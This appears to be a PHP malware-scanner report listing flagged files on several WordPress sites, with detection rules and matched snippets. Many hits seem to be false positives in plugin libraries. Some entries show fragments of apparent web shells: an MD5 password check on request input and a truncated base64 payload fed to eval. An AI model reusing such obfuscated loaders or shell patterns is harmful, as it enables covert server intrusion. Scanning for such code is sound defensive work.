//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/msk/data/www/intimcity-msk.club/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 21:04:52 Modified: 2020-09-27 21:05:08 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimcity-msk.club/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 21:04:53 Modified: 2020-09-27 21:05:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimcity-msk.club/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 21:04:53 Modified: 2020-09-27 21:05:07 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/profile-builder-pro/add-ons/user-listing/userlisting.php Size: 136.84 kB Created: 2022-02-11 19:22:53 Modified: 2022-02-12 01:43:16 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1228 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/profile-builder-pro/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2022-02-11 19:22:53 Modified: 2022-02-12 01:43:16 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 9.13 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 186.03 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/themes/new-design/footer.php Size: 10.33 kB Created: 2022-03-18 11:47:33 Modified: 2022-03-18 11:47:33 Dangers: 1
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/themes/new-design/header.php Size: 7.38 kB Created: 2022-04-22 16:47:00 Modified: 2022-04-22 16:47:00 Dangers: 1
|
//var/www/msk/data/www/prostitutki.moscow/script_smartwall/update.php Size: 9.06 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/prostitutki.moscow/script_smartwall/index.php Size: 38.45 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/prostitutki.moscow/script_smartwall/smartwall.php Size: 8.87 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/msk/data/www/intimparni.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 135.64 kB Created: 2020-09-15 19:17:23 Modified: 2021-05-28 20:14:10 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1207 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/msk/data/www/intimparni.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-28 20:14:08 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimparni.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-28 20:14:08 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimparni.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-28 20:14:08 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 14:00:51 Modified: 2021-05-26 08:49:36 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:36 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
